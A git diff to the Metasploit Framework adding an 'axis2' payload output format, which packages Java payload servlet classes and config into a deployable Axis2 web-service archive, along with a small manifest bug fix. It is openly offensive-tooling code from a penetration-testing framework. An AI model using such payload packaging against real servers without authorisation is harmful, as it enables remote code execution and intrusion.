diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb index d61b2190cc..46015019f6 100644 --- a/lib/msf/core/payload/java.rb +++ b/lib/msf/core/payload/java.rb @@ -107,5 +107,41 @@ module Msf::Payload::Java zip end -end + # + # Used by stagers to create a axis2 webservice file as a {Rex::Zip::Jar}. + # Stagers define a list of class files in @class_files which are pulled + # from the MetasploitPayloads gem. The configuration file is created by + # the payload's #config method. + # + # @option :app_name [String] Name of the Service in services.xml. Defaults to random. + # @return [Rex::Zip::Jar] + def generate_axis2(opts={}) + raise if not respond_to? :config + app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8) + + services_xml = %Q{ +#{Rex::Text.rand_text_alphanumeric(50 + rand(50))} +metasploit.PayloadServlet + + + + +} + + paths = [ + [ 'metasploit', 'Payload.class' ], + [ 'metasploit', 'PayloadServlet.class' ] + ] + @class_files + + zip = Rex::Zip::Jar.new + zip.add_file('META-INF/', '') + zip.add_file('META-INF/services.xml', services_xml) + zip.add_files(paths, MetasploitPayloads.path('java')) + zip.add_file('metasploit.dat', config) + zip.build_manifest(:app_name => app_name) + + zip + end + +end diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index 2879093ba7..07f6256a8a 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -284,20 +284,26 @@ module Msf payload_module = framework.payloads.create(payload) payload_module.datastore.merge!(datastore) case format - when "raw", "jar" - if payload_module.respond_to? :generate_jar - payload_module.generate_jar.pack - else - payload_module.generate - end - when "war" - if payload_module.respond_to? :generate_war - payload_module.generate_war.pack - else - raise InvalidFormat, "#{payload} is not a Java payload" - end + when "raw", "jar" + if payload_module.respond_to? :generate_jar + payload_module.generate_jar.pack else - raise InvalidFormat, "#{format} is not a valid format for Java payloads" + payload_module.generate + end + when "war" + if payload_module.respond_to? :generate_war + payload_module.generate_war.pack + else + raise InvalidFormat, "#{payload} is not a Java payload" + end + when "axis2" + if payload_module.respond_to? :generate_axis2 + payload_module.generate_axis2.pack + else + raise InvalidFormat, "#{payload} is not a Java payload" + end + else + raise InvalidFormat, "#{format} is not a valid format for Java payloads" end end diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 161d85930b..e6446f604c 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -2221,6 +2221,7 @@ require 'msf/core/exe/segment_appender' "asp", "aspx", "aspx-exe", + "axis2", "dll", "elf", "elf-so", diff --git a/lib/rex/zip/jar.rb b/lib/rex/zip/jar.rb index 3fae79ec44..c49054245a 100644 --- a/lib/rex/zip/jar.rb +++ b/lib/rex/zip/jar.rb @@ -47,8 +47,9 @@ class Jar < Archive # def build_manifest(opts={}) main_class = (opts[:main_class] ? randomize(opts[:main_class]) : nil) - app_name = (opts[:app_name] ? randomize(opts[:main_class]) : nil) + app_name = (opts[:app_name] ? randomize(opts[:app_name]) : nil) existing_manifest = nil + meta_inf_exists = @entries.find_all{|item| item.name == 'META-INF/' }.length > 0 @manifest = "Manifest-Version: 1.0\r\n" @manifest << "Main-Class: #{main_class}\r\n" if main_class @@ -69,7 +70,7 @@ class Jar < Archive if existing_manifest existing_manifest.data = @manifest else - add_file("META-INF/", '') + add_file("META-INF/", '') unless meta_inf_exists add_file("META-INF/MANIFEST.MF", @manifest) end end @@ -280,4 +281,3 @@ end end end -